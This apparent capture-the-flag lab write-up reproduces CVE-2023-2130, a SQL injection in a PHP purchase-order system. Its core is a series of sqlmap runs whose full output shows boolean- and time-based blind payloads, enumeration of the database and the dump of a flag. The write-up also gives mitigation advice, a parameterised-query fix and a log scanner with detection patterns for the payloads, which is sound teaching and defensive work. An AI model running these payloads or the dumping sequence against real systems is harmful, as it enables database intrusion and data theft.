Preface
CVE-2023-2130 is a SQL injection vulnerability affecting SourceCodester Purchase Order Management System v1.0. It exists because the application fails to properly filter and validate user input, so an attacker can inject SQL and execute arbitrary SQL commands, gaining unauthorised access to, and control over, the database.
When exploiting this vulnerability, an attacker inserts malicious SQL into an input field in order to:
- Obtain sensitive data: for example user credentials and personal information.
- Modify or delete data: records in the database can be tampered with or removed.
- Perform administrative operations: potentially obtain administrator privileges and carry out higher-level actions.
The vulnerability has a severity rating of 9.8 (CVSSv3) and is classified as high-risk. The following measures mitigate it:
- Use prepared statements: prepared statements and parameterised queries effectively prevent SQL injection.
- Input validation and filtering: strictly validate and filter user input so that only legitimate values are accepted.
- Principle of least privilege: the database account should hold only the minimum privileges its operations require; do not use high-privilege accounts for day-to-day work.
- Secure coding practices: for example use an ORM (object-relational mapping) framework for database operations and avoid concatenating SQL statements by hand.
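As an added illustration of the first two mitigations (example code written here, not code from the SourceCodester project), the flawed pattern behind view_details.php, where the id parameter is spliced into the SQL text, is modelled in Python next to a hardened version that validates the type and binds the value. The in-memory SQLite table, its column names and the supplier rows are constructed assumptions; the boolean payloads used in the test are the ones sqlmap reports later on this page.

```python
import sqlite3

# Constructed stand-in for purchase_order_db.supplier_list; the column names
# and rows are assumptions, not taken from the application's real schema.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE supplier_list (id INTEGER PRIMARY KEY, name TEXT, contact TEXT)")
_conn.executemany(
    "INSERT INTO supplier_list VALUES (?, ?, ?)",
    [(1, "Acme Supplies", "acme@example.com"), (2, "Globex Corp", "sales@globex.example")],
)


def vulnerable_lookup(raw_id: str):
    """Models the defect: the id value is concatenated into the query text.
    A quote inside raw_id closes the string literal, so appended conditions
    become part of the WHERE clause; a true condition returns the row, a
    false one returns nothing, which is exactly the boolean-blind oracle."""
    sql = f"SELECT id, name FROM supplier_list WHERE id = '{raw_id}'"
    return _conn.execute(sql).fetchone()


def is_valid_id(raw_id: str) -> bool:
    """Strict allow-list check: a supplier id is a short string of ASCII digits.
    isascii() guards against non-ASCII code points that isdigit() also accepts."""
    return raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10


def hardened_lookup(raw_id: str):
    """Fix: reject anything that is not an integer, then bind the value as a
    parameter so the database never parses it as SQL."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, name FROM supplier_list WHERE id = ?"
    return _conn.execute(sql, (int(raw_id),)).fetchone()
```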
春秋云镜 (Chunqiu Cloud Mirror) is a cyber range platform focused on security training and hands-on practice. By simulating realistic network environments and attack scenarios it aims to improve users' defensive capability and practical skills. The platform mainly offers the following functions and features:
Hands-on exercises:
- Attack and defence drill scenarios that simulate real network attack incidents, helping users master security techniques through practice.
- Scenarios covering web security, system security, network security, social engineering and other areas.
Vulnerability reproduction:
- Users can reproduce known vulnerabilities on the platform and learn how each one arises, how it is exploited and how it is fixed.
- Practical work helps users build both exploitation and defence skills.
Teaching and training:
- Systematic security courses from beginner to advanced across multiple security domains, suitable for users at different levels.
- Theory combined with practical labs to improve both knowledge and hands-on ability.
Competitions and assessment:
- Regular security competitions such as CTF (Capture The Flag) events to motivate learners.
- Individual and team skill assessments so that learners can gauge their own level.
Resource sharing:
- A rich set of learning resources, including tutorials, tools and case studies, available for reference at any time.
- A community in which users share experience and resources and learn from each other.
春秋云镜 is suitable for security professionals, students and anyone interested in cyber security; continuous study and practice on the platform is an effective way to improve security skills and defensive capability.
Introduction
SourceCodester Purchase Order Management System v1.0 is a web-based application designed to simplify and manage the purchase order process. It is aimed mainly at small and medium-sized businesses, with the goal of improving purchasing efficiency, reducing manual processing errors and keeping purchase records transparent and traceable.
Main features
- User management: administrators can add, edit and delete user accounts and assign different permission levels, so that only authorised users can access and manage purchase orders.
- Supplier management: users can add and manage supplier information, including name, contact details and address, which makes it quick to select and contact a supplier when creating a purchase order.
- Purchase order management: users can create, edit and view purchase orders. Each order includes supplier information, order date, delivery date, order status and a detailed product list.
- Product management: product information can be added and managed, including name, description, price and stock quantity; users choose products when creating a purchase order.
- Reports and records: detailed purchase order reports and history let users review past orders and the status of current ones.
- Notification system: the system can send notifications reminding users to handle new orders or update order status.
Technology stack
- Front end: built with HTML, CSS and JavaScript to provide a user-friendly interface.
- Back end: developed in PHP, handling business logic and database operations.
- Database: MySQL is used to store and manage data, ensuring persistence and integrity.
Installation and running
To install and run SourceCodester Purchase Order Management System v1.0 you need:
- A web server such as Apache or Nginx.
- A PHP environment: make sure PHP is installed and configured on the server.
- A database: set up a MySQL database and import the provided database script.
Advantages
- Simplified purchasing: systematic management improves the efficiency and accuracy of the purchasing process.
- Easy to use: an intuitive interface lets users get started quickly.
- Flexible management: multi-user and permission management support keeps the system secure and flexible.
SourceCodester Purchase Order Management System v1.0 is a practical tool for businesses and organisations that want to streamline their purchasing process.
Vulnerability reproduction
Open the target environment.
Going straight into the application requires logging in.
Visit the vulnerable page, shown below.
Try passing the id parameter.
Use SQLMap to enumerate the databases.
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:44:28 /2024-07-05/

[20:44:28] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=2807ae4e6fb...91fa107729'). Do you want to use those [Y/n] n
[20:44:30] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:44:30] [INFO] testing if the target URL content is stable
[20:44:30] [INFO] target URL content is stable
[20:44:30] [INFO] testing if GET parameter 'id' is dynamic
[20:44:31] [INFO] GET parameter 'id' appears to be dynamic
[20:44:31] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:44:31] [INFO] testing for SQL injection on GET parameter 'id'
[20:44:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:44:31] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[20:44:33] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[20:44:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:44:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:44:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:44:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:44:35] [INFO] testing 'Generic inline queries'
[20:44:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:44:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:44:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:44:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:44:45] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:44:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:44:45] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:44:45] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:44:45] [INFO] target URL appears to have 8 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] n
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:52] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1') and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[20:44:53] [INFO] target URL appears to be UNION injectable with 8 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:44:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.3.33
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:44:58] [INFO] fetching database names
[20:44:58] [INFO] fetching number of databases
[20:44:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:44:58] [INFO] retrieved: 4
[20:44:58] [INFO] retrieved: information_schema
[20:45:05] [INFO] retrieved: mysql
[20:45:07] [INFO] retrieved: performance_schema
[20:45:13] [INFO] retrieved: purchase_order_db
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] purchase_order_db

[20:45:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'
Enumerate the tables
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:48:52 /2024-07-05/

[20:48:52] [INFO] resuming back-end DBMS 'mysql'
[20:48:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=78d32b89ed9...f529d4ed65'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:48:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:48:53] [INFO] fetching tables for database: 'purchase_order_db'
[20:48:53] [INFO] fetching number of tables for database 'purchase_order_db'
[20:48:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:48:53] [INFO] retrieved: 7
[20:48:54] [INFO] retrieved: item_list
[20:48:57] [INFO] retrieved: users
[20:48:59] [INFO] retrieved: supplier_list
[20:49:04] [INFO] retrieved: po_list
[20:49:07] [INFO] retrieved: system_info
[20:49:11] [INFO] retrieved: fllllaaaag
[20:49:16] [INFO] retrieved: order_items
Database: purchase_order_db
[7 tables]
+---------------+
| fllllaaaag    |
| item_list     |
| order_items   |
| po_list       |
| supplier_list |
| system_info   |
| users         |
+---------------+

[20:49:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'
Enumerate the columns
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:50:10 /2024-07-05/

[20:50:11] [INFO] resuming back-end DBMS 'mysql'
[20:50:11] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4a6065bd9e1...c4ebe38f25'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:50:12] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:12] [INFO] fetching columns for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:12] [INFO] retrieved: 2
[20:50:13] [INFO] retrieved: id
[20:50:14] [INFO] retrieved: int(20)
[20:50:18] [INFO] retrieved: flag
[20:50:19] [INFO] retrieved: text
Database: purchase_order_db
Table: fllllaaaag
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| flag   | text    |
| id     | int(20) |
+--------+---------+

[20:50:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'
Dump the data
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" -C "flag" --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:50:39 /2024-07-05/

[20:50:40] [INFO] resuming back-end DBMS 'mysql'
[20:50:40] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=c930771f176...8c2072b16f'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:50:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:41] [INFO] fetching entries of column(s) 'flag' for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [INFO] fetching number of column(s) 'flag' entries for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:41] [INFO] retrieved: 1
[20:50:42] [INFO] retrieved: flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e}
Database: purchase_order_db
Table: fllllaaaag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e} |
+--------------------------------------------+

[20:51:00] [INFO] table 'purchase_order_db.fllllaaaag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/dump/purchase_order_db/fllllaaaag.csv'
[20:51:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'

[*] ending @ 20:51:00 /2024-07-05/
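From the defender's side, the four sqlmap runs above leave a recognisable trail in the web server log: an id value that is not an integer, the boolean and SLEEP() payloads, and on the first run the sqlmap User-Agent. The following added example (written here, not part of the original post or of sqlmap) scans Apache combined-format access log lines for exactly those traits on view_details.php; the log lines, client IPs, timestamps and response sizes are constructed samples.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines modelled on the sqlmap run above;
# client IPs, timestamps and sizes are made up, the payloads are the reported ones.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jul/2024:20:44:31 +0800] "GET /admin/suppliers/view_details.php?id=2 HTTP/1.1" 200 5120 "-" "sqlmap/1.8.4#stable (https://sqlmap.org)"
203.0.113.7 - - [05/Jul/2024:20:44:31 +0800] "GET /admin/suppliers/view_details.php?id=2%27%20AND%204461%3D4461%20AND%20%27TVzr%27%3D%27TVzr HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jul/2024:20:44:40 +0800] "GET /admin/suppliers/view_details.php?id=2%27%20AND%20%28SELECT%204095%20FROM%20%28SELECT%28SLEEP%285%29%29%29HoPf%29%20AND%20%27jALb%27%3D%27jALb HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Jul/2024:20:45:02 +0800] "GET /admin/suppliers/view_details.php?id=3 HTTP/1.1" 200 5130 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')


def classify_id(value: str):
    """Label one decoded id value; None means it is the plain integer the app expects."""
    v = value.lower()
    if v.isdigit():
        return None
    if re.search(r"\bsleep\s*\(", v) or "benchmark(" in v:
        return "time-based blind"
    if re.search(r"'\s*and\s+\d+\s*=\s*\d+", v):
        return "boolean-based blind"
    return "non-numeric id"


def scan_log(text: str):
    """Return (ip, label) findings for every suspicious request to the vulnerable page."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != "/admin/suppliers/view_details.php":
            continue
        # parse_qs percent-decodes, so the value seen here is what PHP's $_GET held
        for raw in parse_qs(parts.query).get("id", []):
            label = classify_id(raw)
            if label:
                findings.append((m["ip"], label))
        if "sqlmap" in m["ua"].lower():
            findings.append((m["ip"], "sqlmap user-agent"))
    return findings


def count_by_source(text: str) -> dict:
    """Findings per client IP; a burst like sqlmap's 140 requests stands out at once."""
    return dict(Counter(ip for ip, _ in scan_log(text)))
```

Changing the User-Agent hides only the last signal; the non-numeric id check fires on every blind-injection request regardless of tooling.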